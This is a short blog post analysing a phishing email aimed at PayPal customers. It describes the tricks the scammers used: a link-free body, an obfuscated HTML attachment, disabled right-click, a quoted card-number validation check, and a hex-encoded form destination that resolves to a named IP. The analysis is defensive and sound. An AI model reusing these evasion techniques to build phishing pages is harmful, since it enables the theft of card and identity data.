I’ve been tracking phishing scams for about a year now and reporting them onto our site: phishingemails.com.
Cyber criminals are putting a lot of efforts these days to bypass security filters. Let’s analyze a phishing email targeting PayPal customers and review the tricks used by scammers.
1) The email:
This email is quite well written, no obvious grammar issues or spelling mistakes. It also sounds important and urges the user to follow the procedure.
There is no link in the email’s body, making it more difficult for security products to scan and detect right away. Also, hyperlinks within messages can sometimes be viewed as potential threats and be blocked by default.
All instructions are attached in a html file (or web page).
2) The attachment:
Again, this is a credible looking form using official logos (including VeriSign).
To avoid detection, the page’s source code has been obfuscated:
By the same token, right-click has been disabled, but not for security reasons – like it states – but rather to prevent people from snooping on the code:
It is crucial the user fills in the form accurately as each piece of information is valuable for resale. Here are the validation checks this page uses (click to enlarge):
A valid Credit Card number is very important, so the hacker makes sure it starts with a 4, 5 or 6 and is 15 or 16 characters long:
if(!/^(4|5|6){1}[0-9]{15,16}$/i.test(frm.elements[‘cuon’].value)){alert(“Please enter a valid Card Number”)
3) The recipient:
Finally, when the form has been completed it can be sent away. Here is another trick used to hide the destination address:
This URL contains hex code which you can convert using some online tool. Note however that the browser can read it automatically!
So the form is sent to: 81.84.241.146/cgi-bis/next.step.php
This IP address points to a server located in Portugal.
Final notes:
Not all phishing scams are that sophisticated… In fact, most are sent “en masse” and probably don’t yield as good results. At the same time, once you create a solid template, you can sell it to other people who don’t need to spend the time or have the knowledge on how to do these things. They’re just interested in harvesting Credit Card numbers, Social Insurance numbers and other personally identifiable information.
Last but not least, criminals will use safety tips against us in a rather sarcastic way. For example, we have been told for ages that our banks will never send us emails, right?
Well, here is a phishing email that actually reminds you of that in…. an email!
It kind of proves all this security talk is not quite well understood. (I refrained myself from saying something really mean here 
)
Jerome Segura
Leave a reply
